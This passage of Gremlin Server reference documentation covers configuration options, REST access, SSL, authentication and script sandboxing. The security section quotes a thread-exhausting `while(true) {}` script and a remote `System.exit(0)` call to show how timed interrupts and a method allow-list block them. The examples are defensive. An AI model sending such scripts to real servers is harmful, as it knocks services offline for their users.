|2\n|connectionPool.reconnectInitialDelay |The amount of time in milliseconds to wait before trying to reconnect to a dead host for the first time. |1000\n|connectionPool.reconnectInterval |The amount of time in milliseconds to wait before trying to reconnect to a dead host. This interval occurs after the time specified by the `reconnectInitialDelay`. |1000\n|connectionPool.resultIterationBatchSize |The override value for the size of the result batches to be returned from the server. |64\n|connectionPool.trustCertChainFile |File location for a SSL Certificate Chain to use when SSL is enabled. If this value is not provided and SSL is enabled, the `TrustManager` will be established with a self-signed certificate which is NOT suitable for production purposes. |_none_\n|hosts |The list of hosts that the driver will connect to. |localhost\n|jaasEntry |Sets the `AuthProperties.Property.JAAS_ENTRY` properties for authentication to Gremlin Server. |_none_\n|nioPoolSize |Size of the pool for handling request\/response operations. |available processors\n|password |The password to submit on requests that require authentication. |_none_\n|port |The port of the Gremlin Server to connect to. The same port will be applied for all hosts. |8192\n|protocol |Sets the `AuthProperties.Property.PROTOCOL` properties for authentication to Gremlin Server. |_none_\n|serializer.className |The fully qualified class name of the `MessageSerializer` that will be used to communicate with the server. Note that the serializer configured on the client should be supported by the server configuration. |`GryoMessageSerializerV1d0`\n|serializer.config |A `Map` of configuration settings for the serializer. |_none_\n|username |The username to submit on requests that require authentication. |_none_\n|workerPoolSize |Size of the pool for handling background work. |available processors * 2\n|=========================================================\n\nPlease see the link:http:\/\/tinkerpop.apache.org\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/driver\/Cluster.Builder.html[Cluster.Builder javadoc] to get more information on these settings.\n\nAliases\n^^^^^^^\n\nScripts submitted to Gremlin Server automatically have the globally configured `Graph` and `TraversalSource` instances\nmade available to them. Therefore, if Gremlin Server configures two `TraversalSource` instances called \"g1\" and \"g2\"\na script can simply reference them directly as:\n\n[source,java]\nclient.submit(\"g1.V()\")\nclient.submit(\"g2.V()\")\n\nWhile this is an acceptable way to submit scripts, it has the downside of forcing the client to encode the server-side\nvariable name directly into the script being sent. If the server configuration ever changed such that \"g1\" became\n\"g100\", the client-side code might have to see a significant amount of change. Decoupling the script code from the\nserver configuration can be managed by the `alias` method on `Client` as follows:\n\n[source,java]\nClient g1Client = client.alias(\"g1\")\nClient g2Client = client.alias(\"g2\")\ng1Client.submit(\"g.V()\")\ng2Client.submit(\"g.V()\")\n\nThe above code demonstrates how the `alias` method can be used such that the script need only contain a reference\nto \"g\" and \"g1\" and \"g2\" are automatically rebound into \"g\" on the server-side.\n\nSerialization\n^^^^^^^^^^^^^\n\nWhen using Gryo serialization (the default serializer for the driver), it is important that the client and server\nhave the same serializers configured or else one or the other will experience serialization exceptions and fail to\nalways communicate. Discrepancy in serializer registration between client and server can happen fairly easily as\ngraphs will automatically include serializers on the server-side, thus leaving the client to be configured manually.\nThis can be done manually as follows:\n\n[source,java]\nGryoMapper kryo = GryoMapper.build().addRegistry(TitanIoRegistry.INSTANCE).create();\nMessageSerializer serializer = new GryoMessageSerializerV1d0(kryo);\nCluster cluster = Cluster.build()\n .serializer(serializer)\n .create();\nClient client = cluster.connect().init();\n\nThe above code demonstrates using the `TitanIoRegistry` which is an `IoRegistry` instance. It tells the serializer\nwhat classes (from Titan in this case) to auto-register during serialization. Gremlin Server roughly uses this same\napproach when it configures it's serializers, so using this same model will ensure compatibility when making requests.\n\nConnecting via REST\n~~~~~~~~~~~~~~~~~~~\n\nimage:gremlin-rexster.png[width=225,float=left] While the default behavior for Gremlin Server is to provide a\nWebSockets-based connection, it can also be configured to support link:http:\/\/en.wikipedia.org\/wiki\/Representational_state_transfer[REST].\nThe REST endpoint provides for a communication protocol familiar to most developers, with a wide support of\nprogramming languages, tools and libraries for accessing it. As a result, REST provides a fast way to get started\nwith Gremlin Server. It also may represent an easier upgrade path from link:http:\/\/rexster.tinkerpop.com\/[Rexster]\nas the API for the endpoint is very similar to Rexster's link:https:\/\/github.com\/tinkerpop\/rexster\/wiki\/Gremlin-Extension[Gremlin Extension].\n\nGremlin Server provides for a single REST endpoint - a Gremlin evaluator - which allows the submission of a Gremlin\nscript as a request. For each request, it returns a response containing the serialized results of that script.\nTo enable this endpoint, Gremlin Server needs to be configured with the `HttpChannelizer`, which replaces the default\n`WebSocketChannelizer`, in the configuration file:\n\n[source,yaml]\nchannelizer: org.apache.tinkerpop.gremlin.server.channel.HttpChannelizer\n\nThis setting is already configured in the `gremlin-server-rest-modern.yaml` file that is packaged with the Gremlin\nServer distribution. To utilize it, start Gremlin Server as follows:\n\n[source,text]\nbin\/gremlin-server.sh conf\/gremlin-server-rest-modern.yaml\n\nOnce the server has started, issue a request. Here's an example with link:http:\/\/curl.haxx.se\/[cURL]:\n\n[source,text]\n$ curl \"http:\/\/localhost:8182?gremlin=100-1\"\n\nwhich returns:\n\n[source,js]\n{\n \"result\":{\"data\":99,\"meta\":{}},\n \"requestId\":\"0581cdba-b152-45c4-80fa-3d36a6eecf1c\",\n \"status\":{\"code\":200,\"attributes\":{},\"message\":\"\"}\n}\n\nThe above example showed a `GET` operation, but the preferred method for this endpoint is `POST`:\n\n[source,text]\ncurl -X POST -d \"{\\\"gremlin\\\":\\\"100-1\\\"}\" \"http:\/\/localhost:8182\"\n\nwhich returns:\n\n[source,js]\n{\n \"result\":{\"data\":99,\"meta\":{}},\n \"requestId\":\"ef2fe16c-441d-4e13-9ddb-3c7b5dfb10ba\",\n \"status\":{\"code\":200,\"attributes\":{},\"message\":\"\"}\n}\n\nIt is also preferred that Gremlin scripts be parameterized when possible via `bindings`:\n\n[source,text]\ncurl -X POST -d \"{\\\"gremlin\\\":\\\"100-x\\\", \\\"bindings\\\":{\\\"x\\\":1}}\" \"http:\/\/localhost:8182\"\n\nThe `bindings` argument is a `Map` of variables where the keys become available as variables in the Gremlin script.\nNote that parameterization of requests is critical to performance, as repeated script compilation can be avoided on\neach request.\n\nNOTE: It is possible to pass bindings via `GET` based requests. Query string arguments prefixed with \"bindings.\" will\nbe treated as parameters, where that prefix will be removed and the value following the period will become the\nparameter name. In other words, `bindings.x` will create a parameter named \"x\" that can be referenced in the submitted\nGremlin script. The caveat is that these arguments will always be treated as `String` values. To ensure that data\ntypes are preserved or to pass complex objects such as lists or maps, use `POST` which will at least support the\nallowed JSON data types.\n\nFinally, as Gremlin Server can host multiple `ScriptEngine` instances (e.g. `gremlin-groovy`, `nashorn`), it is\npossible to define the language to utilize to process the request:\n\n[source,text]\ncurl -X POST -d \"{\\\"gremlin\\\":\\\"100-x\\\", \\\"language\\\":\\\"gremlin-groovy\\\", \\\"bindings\\\":{\\\"x\\\":1}}\" \"http:\/\/localhost:8182\"\n\nBy default this value is set to `gremlin-groovy`. If using a `GET` operation, this value can be set as a query\nstring argument with by setting the `language` key.\n\nWARNING: Consider the size of the result of a submitted script being returned from the REST endpoint. A script\nthat iterates thousands of results will serialize each of those in memory into a single JSON result set. It is\nquite possible that such a script will generate `OutOfMemoryError` exceptions on the server. Consider the default\nWebSockets configuration, which supports streaming, if that type of use case is required.\n\nConfiguring\n~~~~~~~~~~~\n\nAs mentioned earlier, Gremlin Server is configured though a YAML file. By default, Gremlin Server will look for a\nfile called `conf\/gremlin-server.yaml` to configure itself on startup. To override this default, supply the file\nto use to `bin\/gremlin-server.sh` as in:\n\n[source,text]\n----\nbin\/gremlin-server.sh conf\/gremlin-server-min.yaml\n----\n\nThe `gremlin-server.sh` file also serves a second purpose. It can be used to \"install\" dependencies to the Gremlin\nServer path. For example, to be able to configure and use other `Graph` implementations, the dependencies must be\nmade available to Gremlin Server. To do this, use the `-i` switch and supply the Maven coordinates for the dependency\nto \"install\". For example, to use Neo4j in Gremlin Server:\n\n[source,text]\n----\nbin\/gremlin-server.sh -i org.apache.tinkerpop neo4j-gremlin x.y.z\n----\n\nThis command will \"grab\" the appropriate dependencies and copy them to the `ext` directory of Gremlin Server, which\nwill then allow them to be \"used\" the next time the server is started. To uninstall dependencies, simply delete them\nfrom the `ext` directory.\n\nThe following table describes the various configuration options that Gremlin Server expects:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|authentication.className |The fully qualified classname of an `Authenticator` implementation to use. If this setting is not present, then authentication is effectively disabled. |`AllowAllAuthenticator`\n|authentication.config |A `Map` of configuration settings to be passes to the `Authenticator` when it is constructed. The settings available are dependent on the implementation. |_none_\n|channelizer |The fully qualified classname of the `Channelizer` implementation to use. A `Channelizer` is a \"channel initializer\" which Gremlin Server uses to define the type of processing pipeline to use. By allowing different `Channelizer` implementations, Gremlin Server can support different communication protocols (e.g. Websockets, Java NIO, etc.). |`WebSocketChannelizer`\n|graphs |A `Map` of `Graph` configuration files where the key of the `Map` becomes the name to which the `Graph` will be bound and the value is the file name of a `Graph` configuration file. |_none_\n|gremlinPool |The number of \"Gremlin\" threads available to execute actual scripts in a `ScriptEngine`. This pool represents the workers available to handle blocking operations in Gremlin Server. |8\n|host |The name of the host to bind the server to. |localhost\n|useEpollEventLoop |try to use epoll event loops (works only on Linux os) instead of netty NIO. |false\n|maxAccumulationBufferComponents |Maximum number of request components that can be aggregated for a message. |1024\n|maxChunkSize |The maximum length of the content or each chunk. If the content length exceeds this value, the transfer encoding of the decoded request will be converted to 'chunked' and the content will be split into multiple `HttpContent` objects. If the transfer encoding of the HTTP request is 'chunked' already, each chunk will be split into smaller chunks if the length of the chunk exceeds this value. |8192\n|maxContentLength |The maximum length of the aggregated content for a message. Works in concert with `maxChunkSize` where chunked requests are accumulated back into a single message. A request exceeding this size will return a `413 - Request Entity Too Large` status code. A response exceeding this size will raise an internal exception. |65536\n|maxHeaderSize |The maximum length of all headers. |8192\n|maxInitialLineLength |The maximum length of the initial line (e.g. \"GET \/ HTTP\/1.0\") processed in a request, which essentially controls the maximum length of the submitted URI. |4096\n|metrics.consoleReporter.enabled |Turns on console reporting of metrics. |false\n|metrics.consoleReporter.interval |Time in milliseconds between reports of metrics to console. |180000\n|metrics.csvReporter.enabled |Turns on CSV reporting of metrics. |false\n|metrics.csvReporter.fileName |The file to write metrics to. |_none_\n|metrics.csvReporter.interval |Time in milliseconds between reports of metrics to file. |180000\n|metrics.gangliaReporter.addressingMode |Set to `MULTICAST` or `UNICAST`. |_none_\n|metrics.gangliaReporter.enabled |Turns on Ganglia reporting of metrics. |false\n|metrics.gangliaReporter.host |Define the Ganglia host to report Metrics to. |localhost\n|metrics.gangliaReporter.interval |Time in milliseconds between reports of metrics for Ganglia. |180000\n|metrics.gangliaReporter.port |Define the Ganglia port to report Metrics to. |8649\n|metrics.graphiteReporter.enabled |Turns on Graphite reporting of metrics. |false\n|metrics.graphiteReporter.host |Define the Graphite host to report Metrics to. |localhost\n|metrics.graphiteReporter.interval |Time in milliseconds between reports of metrics for Graphite. |180000\n|metrics.graphiteReporter.port |Define the Graphite port to report Metrics to. |2003\n|metrics.graphiteReporter.prefix |Define a \"prefix\" to append to metrics keys reported to Graphite. |_none_\n|metrics.jmxReporter.enabled |Turns on JMX reporting of metrics. |false\n|metrics.slf4jReporter.enabled |Turns on SLF4j reporting of metrics. |false\n|metrics.slf4jReporter.interval |Time in milliseconds between reports of metrics to SLF4j. |180000\n|plugins |A list of plugins that should be activated on server startup in the available script engines. It assumes that the plugins are in Gremlin Server's classpath. |_none_\n|port |The port to bind the server to. |8182\n|processors |A `List` of `Map` settings, where each `Map` represents a `OpProcessor` implementation to use along with its configuration. |_none_\n|processors[X].className |The full class name of the `OpProcessor` implementation. |_none_\n|processors[X].config |A `Map` containing `OpProcessor` specific configurations. |_none_\n|resultIterationBatchSize |Defines the size in which the result of a request is \"batched\" back to the client. In other words, if set to `1`, then a result that had ten items in it would get each result sent back individually. If set to `2` the same ten results would come back in five batches of two each. |64\n|scriptEngines |A `Map` of `ScriptEngine` implementations to expose through Gremlin Server, where the key is the name given by the `ScriptEngine` implementation. The key must match the name exactly for the `ScriptEngine` to be constructed. The value paired with this key is itself a `Map` of configuration for that `ScriptEngine`. |_none_\n|scriptEngines.<name>.imports |A comma separated list of classes\/packages to make available to the `ScriptEngine`. |_none_\n|scriptEngines.<name>.staticImports |A comma separated list of \"static\" imports to make available to the `ScriptEngine`. |_none_\n|scriptEngines.<name>.scripts |A comma separated list of script files to execute on `ScriptEngine` initialization. `Graph` and `TraversalSource` instance references produced from scripts will be stored globally in Gremlin Server, therefore it is possible to use initialization scripts to add Traversal Strategies or create entirely new `Graph` instances all together. Instantiating a `LifeCycleHook` in a script provides a way to execute scripts when Gremlin Server starts and stops.|_none_\n|scriptEngines.<name>.config |A `Map` of configuration settings for the `ScriptEngine`. These settings are dependent on the `ScriptEngine` implementation being used. |_none_\n|scriptEvaluationTimeout |The amount of time in milliseconds before a script evaluation times out. The notion of \"script evaluation\" refers to the time it takes for the `ScriptEngine` to do its work and *not* any additional time it takes for the result of the evaluation to be iterated and serialized. This feature can be turned off by setting the value to `0`. |30000\n|serializers |A `List` of `Map` settings, where each `Map` represents a `MessageSerializer` implementation to use along with its configuration. |_none_\n|serializers[X].className |The full class name of the `MessageSerializer` implementation. |_none_\n|serializers[X].config |A `Map` containing `MessageSerializer` specific configurations. |_none_\n|serializedResponseTimeout |The amount of time in milliseconds before a response serialization times out. The notion of \"response serialization\" refers to the time it takes for Gremlin Server to iterate an entire result after the script is evaluated in the `ScriptEngine`. |30000\n|ssl.enabled |Determines if SSL is turned on or not. |false\n|ssl.keyCertChainFile |The X.509 certificate chain file in PEM format. If this value is not present and `ssl.enabled` is `true` a self-signed certificate will be used (not suitable for production). |_none_\n|ssl.keyFile |The `PKCS#8` private key file in PEM format. If this value is not present and `ssl.enabled` is `true` a self-signed certificate will be used (not suitable for production). |_none_\n|ssl.keyPassword |The password of the `keyFile` if it is password-protected |_none_\n|ssl.trustCertChainFile |Trusted certificates for verifying the remote endpoint's certificate. The file should contain an X.509 certificate chain in PEM format. A system default will be used if this setting is not present. (Not supported) |_none_\n|strictTransactionManagement |Set to `true` to require `aliases` to be submitted on every requests, where the `aliases` become the scope of transaction management. |false\n|threadPoolBoss |The number of threads available to Gremlin Server for accepting connections. Should always be set to `1`. |1\n|threadPoolWorker |The number of threads available to Gremlin Server for processing non-blocking reads and writes. |1\n|writeBufferHighWaterMark | If the number of bytes in the network send buffer exceeds this value then the channel is no longer writeable, accepting no additional writes until buffer is drained and the `writeBufferLowWaterMark` is met. |65536\n|writeBufferLowWaterMark | Once the number of bytes queued in the network send buffer exceeds the `writeBufferHighWaterMark`, the channel will not become writeable again until the buffer is drained and it drops below this value. |65536\n|=========================================================\n\nNOTE: Configuration of link:http:\/\/ganglia.sourceforge.net\/[Ganglia] requires an additional library that is not\npackaged with Gremlin Server due to its LGPL licensing that conflicts with the TinkerPop's Apache 2.0 License. To\nrun Gremlin Server with Ganglia monitoring, download the `org.acplt:oncrpc` jar from\nlink:http:\/\/repo1.maven.org\/maven2\/org\/acplt\/oncrpc\/1.0.7\/[here] and copy it to the Gremlin Server `\/lib` directory\nbefore starting the server.\n\nSecurity\n^^^^^^^^\n\nimage:gremlin-server-secure.png[width=175,float=right] Gremlin Server provides for several features that aid in the\nsecurity of the graphs that it exposes. It has built in SSL support and a pluggable authentication framework using\nlink:https:\/\/en.wikipedia.org\/wiki\/Simple_Authentication_and_Security_Layer[SASL] (Simple Authentication and\nSecurity Layer). SSL options are described in the configuration settings table above, so this section will focus on\nauthentication.\n\nBy default, Gremlin Server is configured to allow all requests to be processed (i.e. no authentication). To enable\nauthentication, Gremlin Server must be configured with an `Authenticator` implementation in its YAML file. Gremlin\nServer comes packaged with an implementation called `SimpleAuthenticator`. The `SimpleAuthenticator` implements the\n`PLAIN` SASL mechanism (i.e. plain text) to authenticate a request. It validates username\/password pairs against a\ngraph database, which must be provided to it as part of the configuration.\n\n[source,yaml]\nauthentication: {\n className: org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator,\n config: {\n credentialsDb: conf\/tinkergraph-credentials.properties}}\n\nQuick Start\n+++++++++++\n\nA quick way to get started with the `SimpleAuthenticator` is to use TinkerGraph for the \"credentials graph\" and the\n\"sample\" credential graph that is packaged with the server.\n\n[source,text]\n----\n$ bin\/gremlin-server.sh conf\/gremlin-server-secure.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-secure.yaml\n...\n[WARN] AbstractChannelizer - Enabling SSL with self-signed certificate (NOT SUITABLE FOR PRODUCTION)\n[INFO] AbstractChannelizer - SSL enabled\n[INFO] SimpleAuthenticator - Initializing authentication with the org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator\n[INFO] SimpleAuthenticator - CredentialGraph initialized at CredentialGraph{graph=tinkergraph[vertices:1 edges:0]}\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nIn addition to configuring the authenticator, `gremlin-server-secure.yaml` also enables SSL with a self-signed\ncertificate. As SSL is enabled on the server it must also be enabled on the client when connecting. To connect to\nGremlin Server with `gremlin-driver`, set the `credentials` and `enableSsl` when constructing the `Cluster`.\n\n[source,java]\nCluster cluster = Cluster.build().credentials(\"stephen\", \"password\")\n .enableSsl(true).create();\n\nIf connecting with Gremlin Console, which utilizes `gremlin-driver` for remote script execution, use the provided\n`conf\/remote-secure.yaml` file when defining the remote. That file contains configuration for the username and\npassword as well as enablement of SSL from the client side.\n\nSimilarly, Gremlin Server can be configured for REST and security.\n\n[source,text]\n----\n$ bin\/gremlin-server.sh conf\/gremlin-server-rest-secure.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-secure.yaml\n...\n[WARN] AbstractChannelizer - Enabling SSL with self-signed certificate (NOT SUITABLE FOR PRODUCTION)\n[INFO] AbstractChannelizer - SSL enabled\n[INFO] SimpleAuthenticator - Initializing authentication with the org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator\n[INFO] SimpleAuthenticator - CredentialGraph initialized at CredentialGraph{graph=tinkergraph[vertices:1 edges:0]}\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nOnce the server has started, issue a request passing the credentials with an `Authentication` header, as described in link:http:\/\/tools.ietf.org\/html\/rfc2617#section-2[RFC2617]. Here's a HTTP Basic authentication example with cURL:\n\n[source,text]\ncurl -X POST --insecure -u stephen:password -d \"{\\\"gremlin\\\":\\\"100-1\\\"}\" \"https:\/\/localhost:8182\"\n\n[[credentials-dsl]]\nCredentials Graph DSL\n+++++++++++++++++++++\n\nThe \"credentials graph\", which has been mentioned in previous sections, is used by Gremlin Server to hold the list of\nusers who can authenticate to the server. It is possible to use virtually any `Graph` instance for this task as long\nas it complies to a defined schema. The credentials graph stores users as vertices with the `label` of \"user\". Each\n\"user\" vertex has two properties: `username` and `password`. Naturally, these are both `String` values. The password\nmust not be stored in plain text and should be hashed.\n\nIMPORTANT: Be sure to define an index on the `username` property, as this will be used for lookups. If supported by\nthe `Graph`, consider specifying a unique constraint as well.\n\nTo aid with the management of a credentials graph, Gremlin Server provides a Gremlin Console plugin which can be\nused to add and remove users so as to ensure that the schema is adhered to, thus ensuring compatibility with Gremlin\n Server. In addition, as it is a plugin, it works naturally in the Gremlin Console as an extension of its\n capabilities (though one could use it programmatically, if desired). This plugin is distributed with the Gremlin\n Console so it does not have to be \"installed\". It does however need to be activated:\n\n[source,groovy]\ngremlin> :plugin use tinkerpop.credentials\n==>tinkerpop.credentials activated\n\nPlease see the example usage as follows:\n\n[gremlin-groovy]\n----\ngraph = TinkerGraph.open()\ngraph.createIndex(\"username\",Vertex.class)\ncredentials = credentials(graph)\ncredentials.createUser(\"stephen\",\"password\")\ncredentials.createUser(\"daniel\",\"better-password\")\ncredentials.createUser(\"marko\",\"rainbow-dash\")\ncredentials.findUser(\"marko\").properties()\ncredentials.countUsers()\ncredentials.removeUser(\"daniel\")\ncredentials.countUsers()\n----\n\n[[script-execution]]\nScript Execution\n++++++++++++++++\n\nIt is important to remember that Gremlin Server exposes a `ScriptEngine` instance that allows for remote execution\nof arbitrary code on the server. Obviously, this situation can represent a security risk or, more minimally, provide\nways for \"bad\" scripts to be inadvertently executed. A simple example of a \"valid\" Gremlin script that would cause\nsome problems would be, `while(true) {}`, which would consume a thread in the Gremlin pool indefinitely, thus\npreventing it from serving other requests. Sending enough of these kinds of scripts would eventually consume all\navailable threads and Gremlin Server would stop responding.\n\nGremlin Server (more specifically the `GremlinGroovyScriptEngine`) provides methods to protect itself from these\nkinds of troublesome scripts. A user can configure the script engine with different `CompilerCustomizerProvider`\nimplementations. Consider the basic configuration from the Gremlin Server YAML file:\n\n[source,yaml]\nscriptEngines: {\n gremlin-groovy: {\n imports: [java.lang.Math],\n staticImports: [java.lang.Math.PI],\n scripts: [scripts\/empty-sample.groovy]}}\n\nThis configuration can be extended to include a `config` key as follows:\n\n[source,yaml]\nscriptEngines: {\n gremlin-groovy: {\n imports: [java.lang.Math],\n staticImports: [java.lang.Math.PI],\n scripts: [scripts\/empty-sample.groovy],\n config: {\n compilerCustomizerProviders: {\n \"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.TimedInterruptCustomizerProvider\":[10000] }}}\n\nThis configuration sets up the script engine with a `CompilerCustomizerProvider` implementation. The\n`TimedInterruptCustomizerProvider` injects checks that ensure that loops (like `while`) can only execute for `10000`\nmilliseconds. With this configuration in place, a remote execution as follows, now times out rather than consuming\nthe thread continuously:\n\n[source,groovy]\ngremlin> :remote connect tinkerpop.server conf\/remote.yaml\n==>Configured localhost\/127.0.0.1:8182\ngremlin> :> while(true) { }\nExecution timed out after 10000 units. Start time: Fri Jul 24 11:04:52 EDT 2015\n\nThere are a number of pre-packaged `CustomizerProvider` implementations:\n\n[width=\"100%\",cols=\"3,10a\",options=\"header\"]\n|=========================================================\n|Customizer |Description\n|`CompileStaticCustomizerProvider` |Applies `CompileStatic` annotations to incoming scripts thus removing dynamic dispatch. More information about static compilation can be found in the link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#_static_compilation[Groovy Documentation]. It is possible to configure this `CustomizerProvider` by specifying a comma separated list of link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#Typecheckingextensions-Workingwithextensions[type checking extensions] that can have the effect of securing calls to various methods.\n|`ThreadInterruptCustomizerProvider` |Injects checks for thread interruption, thus allowing the thread to potentially respect calls to `Thread.interrupt()`\n|`TimedInterruptCustomizerProvider` |Injects checks into loops to interrupt them if they exceed the configured timeout in milliseconds.\n|`TypeCheckedCustomizerProvider` |Similar to the above mentioned, `CompileStaticCustomizerProvider`, the `TypeCheckedCustomizerProvider` injects `TypeChecked` annotations to incoming scripts. More information on the nature of this annotation can be found in the link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#_the_code_typechecked_code_annotation[Groovy Documentation]. It too takes a comma separated list of link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#Typecheckingextensions-Workingwithextensions[type checking extensions].\n|=========================================================\n\nTo provide some basic out-of-the-box protections against troublesome scripts, the following configuration can be used:\n\n[source,yaml]\nscriptEngines: {\n gremlin-groovy: {\n imports: [java.lang.Math],\n staticImports: [java.lang.Math.PI],\n scripts: [scripts\/empty-sample.groovy],\n config: {\n compilerCustomizerProviders: {\n \"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.ThreadInterruptCustomizerProvider\":[],\n \"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.TimedInterruptCustomizerProvider\":[10000],\n \"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.CompileStaticCustomizerProvider\":[\"org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.SimpleSandboxExtension\"]}}}}\n\nNOTE: The above configuration could also use the `TypeCheckedCustomizerProvider` in place of the\n`CompileStaticCustomizerProvider`. The differences between `TypeChecked` and `CompileStatic` are beyond the scope of\nthis documentation. Consult the latest link:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#_typing[Groovy Documentation]\nfor information on the differences. It is important to understand the impact that these configuration will have on\nsubmitted scripts before enabling this feature.\n\nNOTE: The import of classes to the script engine is handled by the `ImportCustomizerProvider`. As the concept of\n\"imports\" is a first-class citizen (i.e. has its own configuration options), it is not recommended that the\n`ImportCustomizerProvider` be used as a configuration option to `compilerCustomizerProviders`.\n\nThis configuration uses the `SimpleSandboxExtension`, which blacklists calls to methods on the `System` class,\nthereby preventing someone from remotely killing the server:\n\n[source,groovy]\n----\ngremlin> :> System.exit(0)\nScript8.groovy: 1: [Static type checking] - Not authorized to call this method: java.lang.System#exit(int)\n @ line 1, column 1.\n System.exit(0)\n ^\n\n1 error\n----\n\nThe `SimpleSandboxExtension` is by no means a \"complete\" implementation protecting against all manner of nefarious\nscripts, but it does provide an example for how such a capability might be implemented. A more complete implementation\nis offered in the `FileSandboxExtension` which uses a configuration file to white list certain classes and methods.\nThe configuration file is YAML-based and an example is presented as follows:\n\n[source,yaml]\n----\nautoTypeUnknown: true\nmethodWhiteList:\n - java\\.lang\\.Boolean.*\n - java\\.lang\\.Byte.*\n - java\\.lang\\.Character.*\n - java\\.lang\\.Double.*\n - java\\.lang\\.Enum.*\n - java\\.lang\\.Float.*\n - java\\.lang\\.Integer.*\n - java\\.lang\\.Long.*\n - java\\.lang\\.Math.*\n - java\\.lang\\.Number.*\n - java\\.lang\\.Object.*\n - java\\.lang\\.Short.*\n - java\\.lang\\.String.*\n - java\\.lang\\.StringBuffer.*\n - java\\.lang\\.System#currentTimeMillis\\(\\)\n - java\\.lang\\.System#nanoTime\\(\\)\n - java\\.lang\\.Throwable.*\n - java\\.lang\\.Void.*\n - java\\.util\\..*\n - org\\.codehaus\\.groovy\\.runtime\\.DefaultGroovyMethods.*\n - org\\.codehaus\\.groovy\\.runtime\\.InvokerHelper#runScript\\(java\\.lang\\.Class,java\\.lang\\.String\\[\\]\\)\n - org\\.codehaus\\.groovy\\.runtime\\.StringGroovyMethods.*\n - groovy\\.lang\\.Script#<init>\\(groovy.lang.Binding\\)\n - org\\.apache\\.tinkerpop\\.gremlin\\.structure\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\.bulkloading\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\.clustering\\.peerpressure\\.*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\.ranking\\.pagerank\\.*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.computer\\.traversal\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.traversal\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.traversal\\.dsl\\.graph\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.process\\.traversal\\.engine\\..*\n - org\\.apache\\.tinkerpop\\.gremlin\\.server\\.util\\.LifeCycleHook.*\nstaticVariableTypes:\n graph: org.apache.tinkerpop.gremlin.structure.Graph\n g: org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.GraphTraversalSource\n----\n\nThere are three keys in this configuration file that control different aspects of the sandbox:\n\n. `autoTypeUnknown` - When set to `true`, unresolved variables are typed as `Object`.\n. `methodWhiteList` - A white list of classes and methods that follow a regex pattern which can then be matched against\nmethod descriptors to determine if they can be executed. The method descriptor is the fully-qualified class name\nof the method, its name and parameters. For example, `Math.ceil` would have a descriptor of\n`java.lang.Math#ceil(double)`.\n. `staticVariableTypes` - A list of variables that will be used in the `ScriptEngine` for which the types are\nalways known. In the above example, the variable \"graph\" will always be bound to a `Graph` instance.\n\nAt Gremlin Server startup, the `FileSandboxExtension` looks in the root of Gremlin Server installation directory for a\nfile called `sandbox.yaml` and configures itself. To use a file in a different location set the\n`gremlinServerSandbox` system property to the location of the file (e.g. `-DgremlinServerSandbox=conf\/my-sandbox.yaml`).\n\nThe `FileSandboxExtension` provides for a basic configurable security function in Gremlin Server. More complex\nsandboxing implementations can be developed by using this white listing model and extending from the\n`AbstractSandboxExtension`.\n\nA final thought on the topic of `CompilerCustomizerProvider` implementations is that they are not just for\n\"security\" (though they are demonstrated in that capacity here). They can be used for a variety of features that\ncan fine tune the Groovy compilation process. Read more about compilation customization in the\nlink:http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/#compilation-customizers[Groovy Documentation].\n\nSerialization\n^^^^^^^^^^^^^\n\nGremlin Server can accept requests and return results using different serialization formats. The format of the\nserialization is configured by the `serializers` setting described in the table above. Note that some serializers\nhave additional configuration options as defined by the `serializers[X].config` setting. The `config` setting is a\n`Map` where the keys and values get passed to the serializer at its initialization. The available and\/or expected\nkeys are dependent on the serializer being used. Gremlin Server comes packaged with two different serializers:\nGraphSON and Gryo.\n\nGraphSON\n++++++++\n\nThe GraphSON serializer produces human readable output in JSON format and is a good configuration choice for those\ntrying to use TinkerPop from non-JVM languages. JSON obviously has wide support across virtually all major\nprogramming languages and can be consumed by a wide variety of tools.\n\n[source,yaml]\n - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0 }\n\nThe above configuration represents the default serialization under the `application\/json` MIME type and produces JSON\nconsistent with standard JSON data types. It has the following configuration option:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plugin any custom serializers that are tied to it. |_none_\n|=========================================================\n\n[source,yaml]\n - { className: 